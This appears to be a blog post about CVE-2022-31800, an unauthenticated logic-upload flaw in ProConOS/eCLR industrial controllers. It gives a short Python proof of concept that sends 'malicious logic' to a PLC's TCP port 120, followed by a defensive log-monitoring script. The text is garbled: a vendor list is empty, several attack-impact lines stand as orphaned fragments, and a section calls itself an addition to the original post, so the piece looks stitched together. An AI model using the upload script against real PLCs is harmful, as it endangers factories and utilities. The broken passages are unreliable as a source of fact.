In 2022, security researchers found a critical vulnerability tracked as CVE-2022-31800 affecting the ProConOS/ProConOS eCLR real-time operating systems. These platforms are used in programmable logic controllers (PLCs) that drive automation in factories, industrial robots, and even key utilities infrastructure worldwide.

What's shocking is just how easy it is for a remote attacker—*with no password or prior access*—to exploit this flaw and gain full control over any affected device. In this post, we'll break down how CVE-2022-31800 works, walk through a proof-of-concept attack, and share resources for protecting your equipment.

What Devices Are at Risk?

ProConOS and ProConOS eCLR are lightweight real-time operating systems made by KW-Software (now part of Phoenix Contact Software). They're deeply embedded into industrial control devices used by several major vendors, including:

and others

If you have PLCs or industrial controllers running *ProConOS* or *ProConOS eCLR*, check your firmware versions immediately.

How Does the Attack Work?

The problem lies in how these devices accept logic updates. An attacker on the network (or sometimes even remotely!) can send specially crafted logic upload requests—*without authentication*—to the device. That means you don’t need a username, password, or any insider info.

Exfiltrate data or sabotage operations

The root issue: Devices listen for logic transfers (often on TCP port 120) but fail to require proper credentials or verification on incoming connections.

Proof-of-Concept Exploit

Below is a simplified proof-of-concept Python snippet. This code attempts to connect to a PLC's logic update port and push a dummy (malicious) logic file.

WARNING: For educational purposes ONLY! DO NOT run this on any device you do not own.

```python
import socket

PLC_IP = "192.0.2.10"  # Placeholder (RFC 5737 documentation address); change to the target PLC's IP
PLC_PORT = 120         # ProConOS standard logic update port
malicious_logic = b"FAKELOGIC"  # In reality, this would be compiled PLC logic.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((PLC_IP, PLC_PORT))
print(f"Connected to PLC at {PLC_IP}:{PLC_PORT}")

# Send the logic as if we were a legitimate tool
s.sendall(malicious_logic)
print("Malicious logic sent. The device could be compromised!")

s.close()
```

With real attack code, an attacker could upload:

A backdoor for ongoing access

Note: Tools like PLCScan and network sniffers like Wireshark can help identify vulnerable devices.

Espionage: Steal industrial recipes or production data.

Similar attacks have hit water plants, car factories, and power plants in the past.

How to check if you’re vulnerable

1. Identify any devices running ProConOS/ProConOS eCLR (check vendor labels, manuals, or with the manufacturer).
2. See if remote logic uploads require authentication (use the above script carefully on a test system).
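Step 2 above actively probes the logic port; a defender also wants the passive side of that check, which is what the "monitor" advice at the end of this post comes down to: every TCP connection to the ProConOS logic-transfer port (TCP 120, as stated above) on a PLC that does not come from an approved engineering workstation is worth an alert, because the device itself will not reject it. The script below is an added example written for this post, not code from the original post or from Phoenix Contact or KW-Software. It assumes a simple constructed connection-log format (`timestamp,src_ip,dst_ip,dst_port,proto`, one record per line, such as you could export from a firewall or flow collector), and the PLC subnet, engineering-host allowlist and sample records are all placeholders using RFC 5737 documentation addresses.

```python
"""
Added example: flag connections to the ProConOS logic-transfer port (TCP 120)
that do not originate from an approved engineering workstation.

All addresses and the log format are constructed for this example
(RFC 5737 documentation ranges); they are not from the advisory.
"""
import ipaddress
from dataclasses import dataclass

LOGIC_PORT = 120  # TCP port the post identifies for ProConOS logic transfers

# Placeholder topology: PLCs live in 192.0.2.0/24, engineering hosts in 198.51.100.0/24
PLC_SUBNET = ipaddress.ip_network("192.0.2.0/24")
ENGINEERING_HOSTS = {
    ipaddress.ip_address("198.51.100.10"),
    ipaddress.ip_address("198.51.100.11"),
}

# Constructed sample log: one connection record per line
SAMPLE_LOG = """\
2022-06-21T08:15:00Z,198.51.100.10,192.0.2.10,120,tcp
2022-06-21T08:16:12Z,203.0.113.5,192.0.2.10,120,tcp
2022-06-21T08:17:40Z,192.0.2.77,192.0.2.11,120,tcp
2022-06-21T08:18:03Z,203.0.113.5,192.0.2.10,502,tcp
not,a,valid,line
2022-06-21T08:19:30Z,198.51.100.11,192.0.2.12,120,udp
"""


@dataclass(frozen=True)
class Alert:
    timestamp: str
    src: str
    dst: str
    reason: str


def parse_record(line):
    """Parse one 'timestamp,src,dst,dst_port,proto' record; None if malformed."""
    fields = [f.strip() for f in line.split(",")]
    if len(fields) != 5:
        return None
    ts, src, dst, port, proto = fields
    try:
        return (ts, ipaddress.ip_address(src), ipaddress.ip_address(dst),
                int(port), proto.lower())
    except ValueError:
        return None


def check_record(line):
    """Return an Alert for a logic-port connection to a PLC from an unapproved source, else None."""
    parsed = parse_record(line)
    if parsed is None:
        return None
    ts, src, dst, port, proto = parsed
    # Only TCP to the logic port on a PLC address is of interest here
    if proto != "tcp" or port != LOGIC_PORT or dst not in PLC_SUBNET:
        return None
    if src in ENGINEERING_HOSTS:
        return None  # expected maintenance traffic
    if src in PLC_SUBNET:
        # A PLC or other device on the control network pushing logic to a peer
        reason = "logic-port connection from an unapproved host inside the control network"
    else:
        reason = "logic-port connection from outside the control network"
    return Alert(ts, str(src), str(dst), reason)


def scan_log(lines):
    """Run check_record over every line and return the list of alerts, in order."""
    alerts = []
    for line in lines:
        alert = check_record(line)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{a.timestamp} {a.src} -> {a.dst}:{LOGIC_PORT} {a.reason}")
```

Run against the constructed sample, this reports two connections: the one from 203.0.113.5 (outside the control network) and the one from 192.0.2.77 (inside the PLC subnet but not an approved workstation). The Modbus connection on port 502, the UDP record and the malformed line are ignored. In practice the allowlist belongs in configuration rather than in the script, and the same rule translates directly into a firewall policy that permits TCP 120 to the PLC subnet only from the engineering hosts, which is the "firewall" half of the post's advice.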

- Original CISA Advisory - ICSA-22-174-01 ProConOS/ eCLR
- Phoenix Contact eCLR/ProConOS Security Notification
- CVSS Details from NVD
- PLCScan Tool for finding exposed PLCs

Conclusion

CVE-2022-31800 is a prime example of how old-school “security by obscurity” in industrial automation is no match for today’s attackers. If your industrial devices run ProConOS or ProConOS eCLR—and you haven’t upgraded or isolated them—*you are at serious risk*.

Take action: patch, firewall, and monitor your critical control devices now.


*If you found this alert helpful, please share it with your operations or IT security team.*

Timeline

Published on: 06/21/2022 08:15:00 UTC
Last modified on: 06/28/2022 17:04:00 UTC